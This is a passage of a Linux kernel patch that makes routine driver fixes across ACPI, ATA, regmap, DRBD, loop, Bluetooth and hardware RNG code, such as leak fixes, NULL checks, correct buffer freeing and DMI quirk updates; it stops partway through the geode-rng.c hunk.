+diff --git a/drivers/acpi/irq.c b/drivers/acpi/irq.c
+index 1cc4647f78b86..c2c786eb95abc 100644
+--- a/drivers/acpi/irq.c
++++ b/drivers/acpi/irq.c
+@@ -94,6 +94,7 @@ EXPORT_SYMBOL_GPL(acpi_unregister_gsi);
+ /**
+  * acpi_get_irq_source_fwhandle() - Retrieve fwhandle from IRQ resource source.
+  * @source: acpi_resource_source to use for the lookup.
++ * @gsi: GSI IRQ number
+  *
+  * Description:
+  * Retrieve the fwhandle of the device referenced by the given IRQ resource
+@@ -297,8 +298,8 @@ EXPORT_SYMBOL_GPL(acpi_irq_get);
+ /**
+  * acpi_set_irq_model - Setup the GSI irqdomain information
+  * @model: the value assigned to acpi_irq_model
+- * @fwnode: the irq_domain identifier for mapping and looking up
+- *          GSI interrupts
++ * @fn: a dispatcher function that will return the domain fwnode
++ *	for a given GSI
+  */
+ void __init acpi_set_irq_model(enum acpi_irq_model_id model,
+ 			       struct fwnode_handle *(*fn)(u32))
+diff --git a/drivers/acpi/pfr_telemetry.c b/drivers/acpi/pfr_telemetry.c
+index 9abf350bd7a5a..27fb6cdad75f9 100644
+--- a/drivers/acpi/pfr_telemetry.c
++++ b/drivers/acpi/pfr_telemetry.c
+@@ -144,7 +144,7 @@ static int get_pfrt_log_data_info(struct pfrt_log_data_info *data_info,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -180,7 +180,7 @@ static int set_pfrt_log_level(int level, struct pfrt_log_device *pfrt_log_dev)
+ 		ret = -EBUSY;
+ 	}
+ 
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -218,7 +218,7 @@ static int get_pfrt_log_level(struct pfrt_log_device *pfrt_log_dev)
+ 	ret = obj->integer.value;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/pfr_update.c b/drivers/acpi/pfr_update.c
+index 6bb0b778b5da5..9d2bdc13253a5 100644
+--- a/drivers/acpi/pfr_update.c
++++ b/drivers/acpi/pfr_update.c
+@@ -178,7 +178,7 @@ static int query_capability(struct pfru_update_cap_info *cap_hdr,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -224,7 +224,7 @@ static int query_buffer(struct pfru_com_buf_info *info,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -385,7 +385,7 @@ static int start_update(int action, struct pfru_device *pfru_dev)
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index acfabfe07c4fa..fc5b5b2c9e819 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -1134,6 +1134,9 @@ static int acpi_processor_get_lpi_info(struct acpi_processor *pr)
+ 	status = acpi_get_parent(handle, &pr_ahandle);
+ 	while (ACPI_SUCCESS(status)) {
+ 		d = acpi_fetch_acpi_dev(pr_ahandle);
++		if (!d)
++			break;
++
+ 		handle = pr_ahandle;
+ 
+ 		if (strcmp(acpi_device_hid(d), ACPI_PROCESSOR_CONTAINER_HID))
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b2a6162876387..ffa19d418847f 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -132,6 +132,10 @@ static int video_detect_force_none(const struct dmi_system_id *d)
+ }
+ 
+ static const struct dmi_system_id video_detect_dmi_table[] = {
++	/*
++	 * Models which should use the vendor backlight interface,
++	 * because of broken ACPI video backlight control.
++	 */
+ 	{
+ 	 /* https://bugzilla.redhat.com/show_bug.cgi?id=1128309 */
+ 	 .callback = video_detect_force_vendor,
+@@ -197,14 +201,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "1015CX"),
+ 		},
+ 	},
+-	{
+-	 .callback = video_detect_force_vendor,
+-	 /* GIGABYTE GB-BXBT-2807 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
+-		},
+-	},
+ 	{
+ 	 .callback = video_detect_force_vendor,
+ 	 /* Samsung N150/N210/N220 */
+@@ -234,18 +230,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	},
+ 	{
+ 	 .callback = video_detect_force_vendor,
+-	 /* Sony VPCEH3U1E */
++	 /* Xiaomi Mi Pad 2 */
+ 	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "VPCEH3U1E"),
++			DMI_MATCH(DMI_SYS_VENDOR, "Xiaomi Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
+ 		},
+ 	},
++
++	/*
++	 * Models which should use the vendor backlight interface,
++	 * because of broken native backlight control.
++	 */
+ 	{
+ 	 .callback = video_detect_force_vendor,
+-	 /* Xiaomi Mi Pad 2 */
++	 /* Sony Vaio PCG-FRV35 */
+ 	 .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Xiaomi Inc"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "PCG-FRV35"),
+ 		},
+ 	},
+ 
+@@ -609,6 +610,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_BOARD_NAME, "N250P"),
+ 		},
+ 	},
++	{
++	 /* https://bugzilla.kernel.org/show_bug.cgi?id=202401 */
++	 .callback = video_detect_force_native,
++	 /* Sony Vaio VPCEH3U1E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "VPCEH3U1E"),
++		},
++	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Sony Vaio VPCY11S1E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "VPCY11S1E"),
++		},
++	},
+ 
+ 	/*
+ 	 * These Toshibas have a broken acpi-video interface for brightness
+@@ -671,6 +689,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "OptiPlex 9020M"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_none,
++	 /* GIGABYTE GB-BXBT-2807 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_none,
+ 	 /* MSI MS-7721 */
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index d7d3f1669d4c0..4e816bb402f68 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -308,7 +308,7 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
+ 	},
+ 	{
+-		/* Lenovo Yoga Tablet 1050F/L */
++		/* Lenovo Yoga Tablet 2 1050F/L */
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corp."),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "VALLEYVIEW C0 PLATFORM"),
+@@ -319,6 +319,27 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+ 					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
+ 	},
++	{
++		/* Lenovo Yoga Tab 3 Pro X90F */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Way too generic, also match on BIOS data */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++	},
+ 	{
+ 		/* Nextbook Ares 8 */
+ 		.matches = {
+@@ -348,6 +369,7 @@ static const struct acpi_device_id i2c_acpi_known_good_ids[] = {
+ 	{ "10EC5640", 0 }, /* RealTek ALC5640 audio codec */
+ 	{ "INT33F4", 0 },  /* X-Powers AXP288 PMIC */
+ 	{ "INT33FD", 0 },  /* Intel Crystal Cove PMIC */
++	{ "INT34D3", 0 },  /* Intel Whiskey Cove PMIC */
+ 	{ "NPCE69A", 0 },  /* Asus Transformer keyboard dock */
+ 	{}
+ };
+diff --git a/drivers/ata/libata-sata.c b/drivers/ata/libata-sata.c
+index b6806d41a8c50..fd4dccc253896 100644
+--- a/drivers/ata/libata-sata.c
++++ b/drivers/ata/libata-sata.c
+@@ -1392,7 +1392,8 @@ static int ata_eh_read_log_10h(struct ata_device *dev,
+ 	tf->hob_lbah = buf[10];
+ 	tf->nsect = buf[12];
+ 	tf->hob_nsect = buf[13];
+-	if (dev->class == ATA_DEV_ZAC && ata_id_has_ncq_autosense(dev->id))
++	if (dev->class == ATA_DEV_ZAC && ata_id_has_ncq_autosense(dev->id) &&
++	    (tf->status & ATA_SENSE))
+ 		tf->auxiliary = buf[14] << 16 | buf[15] << 8 | buf[16];
+ 
+ 	return 0;
+@@ -1456,8 +1457,12 @@ void ata_eh_analyze_ncq_error(struct ata_link *link)
+ 	memcpy(&qc->result_tf, &tf, sizeof(tf));
+ 	qc->result_tf.flags = ATA_TFLAG_ISADDR | ATA_TFLAG_LBA | ATA_TFLAG_LBA48;
+ 	qc->err_mask |= AC_ERR_DEV | AC_ERR_NCQ;
+-	if (dev->class == ATA_DEV_ZAC &&
+-	    ((qc->result_tf.status & ATA_SENSE) || qc->result_tf.auxiliary)) {
++
++	/*
++	 * If the device supports NCQ autosense, ata_eh_read_log_10h() will have
++	 * stored the sense data in qc->result_tf.auxiliary.
++	 */
++	if (qc->result_tf.auxiliary) {
+ 		char sense_key, asc, ascq;
+ 
+ 		sense_key = (qc->result_tf.auxiliary >> 16) & 0xff;
+diff --git a/drivers/base/class.c b/drivers/base/class.c
+index 64f7b9a0970f7..8ceafb7d0203b 100644
+--- a/drivers/base/class.c
++++ b/drivers/base/class.c
+@@ -192,6 +192,11 @@ int __class_register(struct class *cls, struct lock_class_key *key)
+ 	}
+ 	error = class_add_groups(class_get(cls), cls->class_groups);
+ 	class_put(cls);
++	if (error) {
++		kobject_del(&cp->subsys.kobj);
++		kfree_const(cp->subsys.kobj.name);
++		kfree(cp);
++	}
+ 	return error;
+ }
+ EXPORT_SYMBOL_GPL(__class_register);
+diff --git a/drivers/base/power/runtime.c b/drivers/base/power/runtime.c
+index b52049098d4ee..14088b5adb556 100644
+--- a/drivers/base/power/runtime.c
++++ b/drivers/base/power/runtime.c
+@@ -484,7 +484,17 @@ static int rpm_idle(struct device *dev, int rpmflags)
+ 
+ 	dev->power.idle_notification = true;
+ 
+-	retval = __rpm_callback(callback, dev);
++	if (dev->power.irq_safe)
++		spin_unlock(&dev->power.lock);
++	else
++		spin_unlock_irq(&dev->power.lock);
++
++	retval = callback(dev);
++
++	if (dev->power.irq_safe)
++		spin_lock(&dev->power.lock);
++	else
++		spin_lock_irq(&dev->power.lock);
+ 
+ 	dev->power.idle_notification = false;
+ 	wake_up_all(&dev->power.wait_queue);
+diff --git a/drivers/base/regmap/regmap-irq.c b/drivers/base/regmap/regmap-irq.c
+index 4ef9488d05cde..3de89795f5843 100644
+--- a/drivers/base/regmap/regmap-irq.c
++++ b/drivers/base/regmap/regmap-irq.c
+@@ -722,6 +722,7 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 	int i;
+ 	int ret = -ENOMEM;
+ 	int num_type_reg;
++	int num_regs;
+ 	u32 reg;
+ 
+ 	if (chip->num_regs <= 0)
+@@ -796,14 +797,20 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 			goto err_alloc;
+ 	}
+ 
+-	num_type_reg = chip->type_in_mask ? chip->num_regs : chip->num_type_reg;
+-	if (num_type_reg) {
+-		d->type_buf_def = kcalloc(num_type_reg,
++	/*
++	 * Use num_config_regs if defined, otherwise fall back to num_type_reg
++	 * to maintain backward compatibility.
++	 */
++	num_type_reg = chip->num_config_regs ? chip->num_config_regs
++			: chip->num_type_reg;
++	num_regs = chip->type_in_mask ? chip->num_regs : num_type_reg;
++	if (num_regs) {
++		d->type_buf_def = kcalloc(num_regs,
+ 					  sizeof(*d->type_buf_def), GFP_KERNEL);
+ 		if (!d->type_buf_def)
+ 			goto err_alloc;
+ 
+-		d->type_buf = kcalloc(num_type_reg, sizeof(*d->type_buf),
++		d->type_buf = kcalloc(num_regs, sizeof(*d->type_buf),
+ 				      GFP_KERNEL);
+ 		if (!d->type_buf)
+ 			goto err_alloc;
+diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
+index 8532b839a3435..6772402326842 100644
+--- a/drivers/block/drbd/drbd_main.c
++++ b/drivers/block/drbd/drbd_main.c
+@@ -2217,7 +2217,8 @@ void drbd_destroy_device(struct kref *kref)
+ 		kref_put(&peer_device->connection->kref, drbd_destroy_connection);
+ 		kfree(peer_device);
+ 	}
+-	memset(device, 0xfd, sizeof(*device));
++	if (device->submit.wq)
++		destroy_workqueue(device->submit.wq);
+ 	kfree(device);
+ 	kref_put(&resource->kref, drbd_destroy_resource);
+ }
+@@ -2309,7 +2310,6 @@ void drbd_destroy_resource(struct kref *kref)
+ 	idr_destroy(&resource->devices);
+ 	free_cpumask_var(resource->cpu_mask);
+ 	kfree(resource->name);
+-	memset(resource, 0xf2, sizeof(*resource));
+ 	kfree(resource);
+ }
+ 
+@@ -2650,7 +2650,6 @@ void drbd_destroy_connection(struct kref *kref)
+ 	drbd_free_socket(&connection->data);
+ 	kfree(connection->int_dig_in);
+ 	kfree(connection->int_dig_vv);
+-	memset(connection, 0xfc, sizeof(*connection));
+ 	kfree(connection);
+ 	kref_put(&resource->kref, drbd_destroy_resource);
+ }
+@@ -2774,7 +2773,7 @@ enum drbd_ret_code drbd_create_device(struct drbd_config_context *adm_ctx, unsig
+ 
+ 	err = add_disk(disk);
+ 	if (err)
+-		goto out_idr_remove_from_resource;
++		goto out_destroy_workqueue;
+ 
+ 	/* inherit the connection state */
+ 	device->state.conn = first_connection(resource)->cstate;
+@@ -2788,6 +2787,8 @@ enum drbd_ret_code drbd_create_device(struct drbd_config_context *adm_ctx, unsig
+ 	drbd_debugfs_device_add(device);
+ 	return NO_ERROR;
+ 
++out_destroy_workqueue:
++	destroy_workqueue(device->submit.wq);
+ out_idr_remove_from_resource:
+ 	for_each_connection_safe(connection, n, resource) {
+ 		peer_device = idr_remove(&connection->peer_devices, vnr);
+diff --git a/drivers/block/drbd/drbd_nl.c b/drivers/block/drbd/drbd_nl.c
+index 864c98e748757..249eba7d21c28 100644
+--- a/drivers/block/drbd/drbd_nl.c
++++ b/drivers/block/drbd/drbd_nl.c
+@@ -1210,6 +1210,7 @@ static void decide_on_discard_support(struct drbd_device *device,
+ 	struct drbd_connection *connection =
+ 		first_peer_device(device)->connection;
+ 	struct request_queue *q = device->rq_queue;
++	unsigned int max_discard_sectors;
+ 
+ 	if (bdev && !bdev_max_discard_sectors(bdev->backing_bdev))
+ 		goto not_supported;
+@@ -1230,15 +1231,14 @@ static void decide_on_discard_support(struct drbd_device *device,
+ 	 * topology on all peers.
+ 	 */
+ 	blk_queue_discard_granularity(q, 512);
+-	q->limits.max_discard_sectors = drbd_max_discard_sectors(connection);
+-	q->limits.max_write_zeroes_sectors =
+-		drbd_max_discard_sectors(connection);
++	max_discard_sectors = drbd_max_discard_sectors(connection);
++	blk_queue_max_discard_sectors(q, max_discard_sectors);
++	blk_queue_max_write_zeroes_sectors(q, max_discard_sectors);
+ 	return;
+ 
+ not_supported:
+ 	blk_queue_discard_granularity(q, 0);
+-	q->limits.max_discard_sectors = 0;
+-	q->limits.max_write_zeroes_sectors = 0;
++	blk_queue_max_discard_sectors(q, 0);
+ }
+ 
+ static void fixup_write_zeroes(struct drbd_device *device, struct request_queue *q)
+diff --git a/drivers/block/floppy.c b/drivers/block/floppy.c
+index ccad3d7b3ddd9..487840e3564df 100644
+--- a/drivers/block/floppy.c
++++ b/drivers/block/floppy.c
+@@ -4593,8 +4593,10 @@ static int __init do_floppy_init(void)
+ 			goto out_put_disk;
+ 
+ 		err = floppy_alloc_disk(drive, 0);
+-		if (err)
++		if (err) {
++			blk_mq_free_tag_set(&tag_sets[drive]);
+ 			goto out_put_disk;
++		}
+ 
+ 		timer_setup(&motor_off_timer[drive], motor_off_callback, 0);
+ 	}
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index ad92192c7d617..d12d3d171ec4c 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1773,7 +1773,16 @@ static const struct block_device_operations lo_fops = {
+ /*
+  * And now the modules code and kernel interface.
+  */
+-static int max_loop;
++
++/*
++ * If max_loop is specified, create that many devices upfront.
++ * This also becomes a hard limit. If max_loop is not specified,
++ * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
++ * init time. Loop devices can be requested on-demand with the
++ * /dev/loop-control interface, or be instantiated by accessing
++ * a 'dead' device node.
++ */
++static int max_loop = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+ module_param(max_loop, int, 0444);
+ MODULE_PARM_DESC(max_loop, "Maximum number of loop devices");
+ module_param(max_part, int, 0444);
+@@ -2181,7 +2190,7 @@ MODULE_ALIAS("devname:loop-control");
+ 
+ static int __init loop_init(void)
+ {
+-	int i, nr;
++	int i;
+ 	int err;
+ 
+ 	part_shift = 0;
+@@ -2209,19 +2218,6 @@ static int __init loop_init(void)
+ 		goto err_out;
+ 	}
+ 
+-	/*
+-	 * If max_loop is specified, create that many devices upfront.
+-	 * This also becomes a hard limit. If max_loop is not specified,
+-	 * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
+-	 * init time. Loop devices can be requested on-demand with the
+-	 * /dev/loop-control interface, or be instantiated by accessing
+-	 * a 'dead' device node.
+-	 */
+-	if (max_loop)
+-		nr = max_loop;
+-	else
+-		nr = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+-
+ 	err = misc_register(&loop_misc);
+ 	if (err < 0)
+ 		goto err_out;
+@@ -2233,7 +2229,7 @@ static int __init loop_init(void)
+ 	}
+ 
+ 	/* pre-create number of devices given by config or max_loop */
+-	for (i = 0; i < nr; i++)
++	for (i = 0; i < max_loop; i++)
+ 		loop_add(i);
+ 
+ 	printk(KERN_INFO "loop: module loaded\n");
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index a657e9a3e96a5..f6b4b7a1be4cc 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -2524,7 +2524,7 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 		 */
+ 		err = btintel_read_version(hdev, &ver);
+ 		if (err)
+-			return err;
++			break;
+ 
+ 		/* Apply the device specific HCI quirks
+ 		 *
+@@ -2566,7 +2566,8 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 	default:
+ 		bt_dev_err(hdev, "Unsupported Intel hw variant (%u)",
+ 			   INTEL_HW_VARIANT(ver_tlv.cnvi_bt));
+-		return -EINVAL;
++		err = -EINVAL;
++		break;
+ 	}
+ 
+ exit_error:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index f05018988a177..6beafd62d7226 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -802,13 +802,13 @@ static inline void btusb_free_frags(struct btusb_data *data)
+ 
+ 	spin_lock_irqsave(&data->rxlock, flags);
+ 
+-	kfree_skb(data->evt_skb);
++	dev_kfree_skb_irq(data->evt_skb);
+ 	data->evt_skb = NULL;
+ 
+-	kfree_skb(data->acl_skb);
++	dev_kfree_skb_irq(data->acl_skb);
+ 	data->acl_skb = NULL;
+ 
+-	kfree_skb(data->sco_skb);
++	dev_kfree_skb_irq(data->sco_skb);
+ 	data->sco_skb = NULL;
+ 
+ 	spin_unlock_irqrestore(&data->rxlock, flags);
+diff --git a/drivers/bluetooth/hci_bcm.c b/drivers/bluetooth/hci_bcm.c
+index d7e0b75db8a60..2b6c0e1922cb3 100644
+--- a/drivers/bluetooth/hci_bcm.c
++++ b/drivers/bluetooth/hci_bcm.c
+@@ -53,11 +53,13 @@
+  * struct bcm_device_data - device specific data
+  * @no_early_set_baudrate: Disallow set baudrate before driver setup()
+  * @drive_rts_on_open: drive RTS signal on ->open() when platform requires it
++ * @no_uart_clock_set: UART clock set command for >3Mbps mode is unavailable
+  * @max_autobaud_speed: max baudrate supported by device in autobaud mode
+  */
+ struct bcm_device_data {
+ 	bool	no_early_set_baudrate;
+ 	bool	drive_rts_on_open;
++	bool	no_uart_clock_set;
+ 	u32	max_autobaud_speed;
+ };
+ 
+@@ -100,6 +102,7 @@ struct bcm_device_data {
+  * @is_suspended: whether flow control is currently disabled
+  * @no_early_set_baudrate: don't set_baudrate before setup()
+  * @drive_rts_on_open: drive RTS signal on ->open() when platform requires it
++ * @no_uart_clock_set: UART clock set command for >3Mbps mode is unavailable
+  * @pcm_int_params: keep the initial PCM configuration
+  * @use_autobaud_mode: start Bluetooth device in autobaud mode
+  * @max_autobaud_speed: max baudrate supported by device in autobaud mode
+@@ -140,6 +143,7 @@ struct bcm_device {
+ #endif
+ 	bool			no_early_set_baudrate;
+ 	bool			drive_rts_on_open;
++	bool			no_uart_clock_set;
+ 	bool			use_autobaud_mode;
+ 	u8			pcm_int_params[5];
+ 	u32			max_autobaud_speed;
+@@ -172,10 +176,11 @@ static inline void host_set_baudrate(struct hci_uart *hu, unsigned int speed)
+ static int bcm_set_baudrate(struct hci_uart *hu, unsigned int speed)
+ {
+ 	struct hci_dev *hdev = hu->hdev;
++	struct bcm_data *bcm = hu->priv;
+ 	struct sk_buff *skb;
+ 	struct bcm_update_uart_baud_rate param;
+ 
+-	if (speed > 3000000) {
++	if (speed > 3000000 && !bcm->dev->no_uart_clock_set) {
+ 		struct bcm_write_uart_clock_setting clock;
+ 
+ 		clock.type = BCM_UART_CLOCK_48MHZ;
+@@ -1529,6 +1534,7 @@ static int bcm_serdev_probe(struct serdev_device *serdev)
+ 		bcmdev->max_autobaud_speed = data->max_autobaud_speed;
+ 		bcmdev->no_early_set_baudrate = data->no_early_set_baudrate;
+ 		bcmdev->drive_rts_on_open = data->drive_rts_on_open;
++		bcmdev->no_uart_clock_set = data->no_uart_clock_set;
+ 	}
+ 
+ 	return hci_uart_register_device(&bcmdev->serdev_hu, &bcm_proto);
+@@ -1550,6 +1556,10 @@ static struct bcm_device_data bcm43438_device_data = {
+ 	.drive_rts_on_open = true,
+ };
+ 
++static struct bcm_device_data cyw4373a0_device_data = {
++	.no_uart_clock_set = true,
++};
++
+ static struct bcm_device_data cyw55572_device_data = {
+ 	.max_autobaud_speed = 921600,
+ };
+@@ -1566,6 +1576,7 @@ static const struct of_device_id bcm_bluetooth_of_match[] = {
+ 	{ .compatible = "brcm,bcm4349-bt", .data = &bcm43438_device_data },
+ 	{ .compatible = "brcm,bcm43540-bt", .data = &bcm4354_device_data },
+ 	{ .compatible = "brcm,bcm4335a0" },
++	{ .compatible = "cypress,cyw4373a0-bt", .data = &cyw4373a0_device_data },
+ 	{ .compatible = "infineon,cyw55572-bt", .data = &cyw55572_device_data },
+ 	{ },
+ };
+diff --git a/drivers/bluetooth/hci_bcsp.c b/drivers/bluetooth/hci_bcsp.c
+index cf4a560958173..8055f63603f45 100644
+--- a/drivers/bluetooth/hci_bcsp.c
++++ b/drivers/bluetooth/hci_bcsp.c
+@@ -378,7 +378,7 @@ static void bcsp_pkt_cull(struct bcsp_struct *bcsp)
+ 		i++;
+ 
+ 		__skb_unlink(skb, &bcsp->unack);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 
+ 	if (skb_queue_empty(&bcsp->unack))
+diff --git a/drivers/bluetooth/hci_h5.c b/drivers/bluetooth/hci_h5.c
+index c5a0409ef84fd..6455bc4fb5bb3 100644
+--- a/drivers/bluetooth/hci_h5.c
++++ b/drivers/bluetooth/hci_h5.c
+@@ -313,7 +313,7 @@ static void h5_pkt_cull(struct h5 *h5)
+ 			break;
+ 
+ 		__skb_unlink(skb, &h5->unack);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 
+ 	if (skb_queue_empty(&h5->unack))
+diff --git a/drivers/bluetooth/hci_ll.c b/drivers/bluetooth/hci_ll.c
+index 4eb420a9ed04e..5abc01a2acf72 100644
+--- a/drivers/bluetooth/hci_ll.c
++++ b/drivers/bluetooth/hci_ll.c
+@@ -345,7 +345,7 @@ static int ll_enqueue(struct hci_uart *hu, struct sk_buff *skb)
+ 	default:
+ 		BT_ERR("illegal hcill state: %ld (losing packet)",
+ 		       ll->hcill_state);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 8df11016fd51b..bae9b2a408d95 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -912,7 +912,7 @@ static int qca_enqueue(struct hci_uart *hu, struct sk_buff *skb)
+ 	default:
+ 		BT_ERR("Illegal tx state: %d (losing packet)",
+ 		       qca->tx_ibs_state);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/char/hw_random/amd-rng.c b/drivers/char/hw_random/amd-rng.c
+index c22d4184bb612..0555e3838bce1 100644
+--- a/drivers/char/hw_random/amd-rng.c
++++ b/drivers/char/hw_random/amd-rng.c
+@@ -143,15 +143,19 @@ static int __init amd_rng_mod_init(void)
+ found:
+ 	err = pci_read_config_dword(pdev, 0x58, &pmbase);
+ 	if (err)
+-		return err;
++		goto put_dev;
+ 
+ 	pmbase &= 0x0000FF00;
+-	if (pmbase == 0)
+-		return -EIO;
++	if (pmbase == 0) {
++		err = -EIO;
++		goto put_dev;
++	}
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		err = -ENOMEM;
++		goto put_dev;
++	}
+ 
+ 	if (!request_region(pmbase + PMBASE_OFFSET, PMBASE_SIZE, DRV_NAME)) {
+ 		dev_err(&pdev->dev, DRV_NAME " region 0x%x already in use!\n",
+@@ -185,6 +189,8 @@ err_iomap:
+ 	release_region(pmbase + PMBASE_OFFSET, PMBASE_SIZE);
+ out:
+ 	kfree(priv);
++put_dev:
++	pci_dev_put(pdev);
+ 	return err;
+ }
+ 
+@@ -200,6 +206,8 @@ static void __exit amd_rng_mod_exit(void)
+ 
+ 	release_region(priv->pmbase + PMBASE_OFFSET, PMBASE_SIZE);
+ 
++	pci_dev_put(priv->pcidev);
++
+ 	kfree(priv);
+ }
+ 
+diff --git a/drivers/char/hw_random/geode-rng.c b/drivers/char/hw_random/geode-rng.c
+index 138ce434f86b2..12fbe80918319 100644
+--- a/drivers/char/hw_random/geode-rng.c
++++ b/drivers/char/hw_random/geode-rng.c
+@@ -51,6 +51,10 @@ static const struct pci_device_id pci_tbl[] = {
+ };
+ MODULE_DEVICE_TABLE(pci, pci_tbl);
+ 
++struct amd_geode_priv {
++	struct pci_dev *pcidev;
++	void __iomem *membase;
++};
+ 
+ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ {
+@@ -90,6 +94,7 @@ static int __init geode_rng_init(void)
+ 	const struct pci_device_id *ent;
+ 	void __iomem *mem;
+ 	unsigned long rng_base;
++	struct amd_geode_priv *priv;
+ 
+ 	for_each_pci_dev(pdev) {
+ 		ent = pci_match_id(pci_tbl, pdev);
+@@ -97,17 +102,26 @@ static int __init geode_rng_init(void)
+ 			goto found;
+ 	}
+ 	/* Device not found. */
+-	goto out;
++	return err;
+ 
+ found:
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv) {
++		err = -ENOMEM;
++		goto put_dev;
++	}
++
+ 	rng_base = pci_resource_start(pdev, 0);
+ 	if (rng_base == 0)
+-		goto out;
++		goto free_priv;
+ 	err = -ENOMEM;
+ 	mem = ioremap(rng_base, 0x58);
+ 	if (!mem)
+-		goto out;
+-	geode_rng.priv = (unsigned long)mem;
